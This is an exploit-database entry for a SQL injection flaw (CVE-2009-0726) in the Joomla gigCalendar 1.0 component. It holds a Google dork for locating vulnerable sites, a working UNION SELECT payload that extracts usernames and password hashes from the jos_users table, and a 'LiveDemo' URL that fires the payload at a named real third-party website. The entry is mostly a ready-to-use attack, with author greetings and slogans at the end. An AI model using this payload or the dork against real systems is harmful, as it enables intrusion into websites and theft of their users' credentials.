Joomla! Component gigCalendar 1.0 - SQL Injection

Author: boom3rang
type: webapps
platform: php
port: 
date_added: 2009-01-12 
date_updated: 2017-01-17 
verified: 1 
codes: OSVDB-52257;CVE-2009-0726 
tags: 
aliases:  
screenshot_url:  
application_url: 

#############################################################
Joomla Component com_gigcal(gigcal_gigs_id) SQL-injection
#############################################################


###################################################
#[~] Author        :  boom3rang
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection
#[~] Google Dork   :  inurl:com_gigcal
--------------------------------------------------
#[!] Name          :  GigCalendar
#[!] creationDate  :  Dec 2005
#[!] Created by    :  Graham Spice, David Richards
#[!] AuthorEmail   :  capt@gigcalendar.net
#[!] Site          :  www.gigcalendar.net
#[!] Version       :  1.0
#[!] Download      :  http://joomlacode.org/gf/project/gigcalendar/frs/?action=FrsReleaseBrowse&frs_package_id=214
###################################################


[-] Example:
http://localhost/Path/index.php?option=com_gigcal&task=details&gigcal_gigs_id=[Exploit]


[-] Exploit:
'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*


[-] LiveDemo:
http://dromnyc.com/home/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users/*&Itemid=37


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
#[!] Free Palestine
##############################

# milw0rm.com [2009-01-13]